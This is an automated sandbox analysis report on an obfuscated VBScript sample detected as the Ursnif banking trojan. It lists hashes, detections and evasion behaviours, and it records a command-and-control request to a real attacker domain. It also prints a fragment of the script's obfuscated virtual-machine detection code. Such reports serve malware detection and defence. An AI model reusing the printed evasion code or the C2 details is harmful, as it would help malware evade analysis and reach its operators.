Analysis Report WoXAp0Q0zaNl.vbs

Overview

General Information

Sample Name: WoXAp0Q0zaNl.vbs
Analysis ID: 283989
MD5: baa0a7597d2ebb9199a1e679dc96ea41
SHA1: bf2593d95a4b948cc702be4863dd994744e68033
SHA256: 23b57a9859e8c6d0f851ec43eef95689cd728e4b64087e2222f47158bf40bbb5

Most interesting Screenshot:

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\digram.it Virustotal: Detection: 23% Perma Link
Source: C:\Users\user\AppData\Local\Temp\digram.it ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: WoXAp0Q0zaNl.vbs Virustotal: Detection: 21% Perma Link
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: global traffic HTTP traffic detected: GET /api1/YXIIEbjr/LKHsOdzDIb6srGqE_2F2Er6/HCbOtaiM62/3Ar3CmbW41bZrpoR_/2BGysJ7tJIut/_2BFAukfihC/tpgdEs38KtyYHo/kktDpMw4OLyq38u7ZBnvv/42Welbey1DQFDT5_/2BD_2F2IHF2O0r1/yrQwG6dWZ8DmHPk7oN/EbhuDrivI/J_2B_2BFq9IFGp8_2BI_/2FCylN_2BEo819KSTwa/0MXm2M1VxU28J3cJ4ol9MT/sZwPzVemSBoyC/1Lvtf_2B/yGj2SU2fE7V0Oth_2Foz_0A/_0DFm2ouNB/hfL_2Baahr1huA43q/Z1YUxW6qUxNZ/H_2B5MCMqWQ/nJi24tA8M_2Fov/zPX5bTYz9z/ohH HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Sep 2020 13:03:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.19.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.19.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.19.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.19.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.19.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.19.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.19.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.19.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\digram.it A5B0036E0B2C73D3A8F47ED153CAA974EC04A870E06FB5F144C584B58B54DEC9
Java / VBScript file with very long strings (likely obfuscated code)
Source: WoXAp0Q0zaNl.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal96.troj.evad.winVBS@4/24@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: WoXAp0Q0zaNl.vbs Virustotal: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: WoXAp0Q0zaNl.vbs Static file information: File size 1177208 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\Rise\75\idea\toward\94\Scale\Live\34\Best\77\25\All\Whose.pdb source: digram.it.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(702240904)) > 0 And Welles682 = 0) ThenExit Function' dutiful irredentist239 scopic Galbreath huckleberry example563 wastage Messiah clientele protozoan role merrymake Casanova alkaloid, circumpolar poesy derelict incapacity Chalmers tuple568 brindle syphilitic nightdress, 7557426 pietism hippodrome varnish Ackley libation chinquapin Daedalus might chiefdom eyeball Samson Chesterton vii buzzy bandwagon Calhoun Lyle formulate McKenzie intimater surpass anew upcome spinneret End IfSet PEpttService = GetObject("winmgmts:\\.\root\cimv2")Set GJkCFmZlItems = PEpttService.ExecQuery("Select * from Win32_ComputerSystem")For Each hgYKL In GJkCFmZlItems' giggle713 doctrinal exchange impunity552 fable Huston clung hatchet367 swallow pickle319 aberrate emigrate columnar behead gardenia extempore340 Cervantes taboo aluminate384 Riordan screw74 poke tenement glutamine oddball175 subservient25 citizenry rakish926 annular spiritual, Lazarus betroth230 nostalgic Seattle Argive sandwich childish wallow. acrobatic ha calamus gaur nighttime concordant thistledown circumcision erratum, interregnum bashful lay195 Vanderpoel apotheosis870 Loire. 1890016 airflow814, Lockhart rebel hegemony auxiliary echo412 joyride onward broil sheepherder deputation workload718 exfoliate Laurent Hans GhbaI = GhbaI + Int((hgYKL.TotalPhysicalMemory) / ((1048658 - 79.0) - (72 + (-(1 + 68.0)))))REM embodiment, Guinevere, Vishnu kneel81 macaque706. burglar debonair ambrose456 lax hydroxyl wholly scuffle. wraith beneath minuscule86 sandpaper bruit parent mound502, televise viscount taxi quaff Archibald whack cohere40. 2161742 conserve shirt891 Hippocratic arc tularemia leeway chase flipflop sailor Blaine Jolla mulligan serve Gibson89 Giovanni. 7282276 opal, 9667674 reb, 278783 pterodactyl. bronze phone984 Aztec phosphate concision oh flake hectic moreover797 despoil tawny degumming hundredfold Next' conciliate advent. 4668633 carnation898 wire, 9922102 quixotic, drive refrigerate371, intricacy Dooley stupor Giuliano open763 county exogenous punctuate ancient Furman stowage vernal478 redshank digress amethystine breakpoint hodgepodge neutral infallible Mycenae oaken amoebae autocratic Carmen quadrangular coypu Edmonds periphrastic inapplicable collaborate penmen Wagner congratulatory messy. 3091313 loot guitar943 If GhbaI < (((276 - 228.0) + (86 + 2760.0)) - 1864.0) Then' freshmen stagnant summit508 Hilbert tarpon tarantula tower252 sukiyaki dutiable Ella drill. 8689681 berry903 dictatorial antiquary dosimeter n949 claim. minima weave, corpuscular poisonous ecology stearic Stafford Fordham intellectual perspicuity telecommunicate310 Evans sapsucker. Wong roommate dexterity. Harlem wastewater Blum. 7341983 wakeup lore faithful invasion428 portrait78 vociferous floc184 tollhouse sourberry, Cretan964 ameliorate Ada. Elmira, primal freeload, beneficent oblate yaw ally Libya fiat daylight, 1604588 statuary candy216 orthodontist819 animadversion cocky stolid symp

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\digram.it Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\digram.it Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\woxap0q0zanl.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\digram.it Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7088 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.236288354.000001B818AB5000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: digram.it.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY